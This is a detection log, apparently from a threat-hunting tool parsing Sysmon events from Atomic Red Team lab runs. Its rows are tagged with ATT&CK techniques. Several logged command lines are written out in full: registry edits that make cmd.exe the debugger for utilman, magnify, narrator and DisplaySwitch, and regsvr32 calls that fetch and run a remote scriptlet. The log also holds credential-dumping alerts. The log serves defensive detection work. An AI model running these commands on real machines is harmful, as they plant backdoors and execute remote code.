HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3749 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:17.916 + 747F3D96-D8A9-5D31-0000-001072C43200 + 6068 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547817.941637,2019-07-19T18:50:17.941637+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3748 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:14.762 + 747F3D96-D8A6-5D31-0000-0010F9B13200 + 6664 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547814.692289,2019-07-19T18:50:14.692289+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3745 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:14.649 + 747F3D96-D8A6-5D31-0000-001053A73200 + 6888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547814.678185,2019-07-19T18:50:14.678185+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3744 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:13.173 + 747F3D96-D8A5-5D31-0000-0010C0A03200 + 6116 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547813.127595,2019-07-19T18:50:13.127595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3741 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:13.096 + 747F3D96-D8A5-5D31-0000-0010729B3200 + 4212 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547813.109148,2019-07-19T18:50:13.109148+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3740 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:10.306 + 747F3D96-D8A2-5D31-0000-0010D8943200 + 2484 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547810.282757,2019-07-19T18:50:10.282757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3737 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:10.253 + 747F3D96-D8A2-5D31-0000-00108A8F3200 + 6156 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547810.26663,2019-07-19T18:50:10.266630+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3736 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:07.335 + 747F3D96-D89F-5D31-0000-0010BC823200 + 2404 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 1103 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-NTSSLJD + + + + + - + 2020-10-20 11:51:09.588 + 23F38D93-CEB4-5F8E-9F08-000000000C00 + 9392 + C:\Windows\System32\mmc.exe + C:\Windows\System32\samlib.dll + 10.0.18362.1049 (WinBuild.160101.0800) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SAMLib.DLL + SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B + true + Microsoft Windows + Valid + +",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 1103 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-NTSSLJD + + + + + - + 2020-10-20 11:51:09.588 + 23F38D93-CEB4-5F8E-9F08-000000000C00 + 9392 + C:\Windows\System32\mmc.exe + C:\Windows\System32\samlib.dll + 10.0.18362.1049 (WinBuild.160101.0800) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SAMLib.DLL + SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B + true + Microsoft Windows + Valid + +",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548027.083068,2019-07-19T18:53:47.083068+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4046 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.938 + 747F3D96-D97A-5D31-0000-00102BE33800 + 4628 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4045 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.867 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4045 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.867 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4045 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.867 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4044 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.831 + 747F3D96-D97A-5D31-0000-00109DDC3800 + 3564 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4044 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.831 + 747F3D96-D97A-5D31-0000-00109DDC3800 + 3564 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4044 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.831 + 747F3D96-D97A-5D31-0000-00109DDC3800 + 3564 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563548026.848703,2019-07-19T18:53:46.848703+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4043 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 14:53:40.896 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49728 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548026.589404,2019-07-19T18:53:46.589404+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4042 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.405 + 747F3D96-D97A-5D31-0000-001089BD3800 + 7148 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548026.565529,2019-07-19T18:53:46.565529+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4041 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:46.135 + 747F3D96-D97A-5D31-0000-00105DA83800 + 4336 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\calc.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4038 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:44.049 + 747F3D96-D978-5D31-0000-0010EB313800 + 2076 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-D978-5D31-0000-0010442F3800 + 2832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 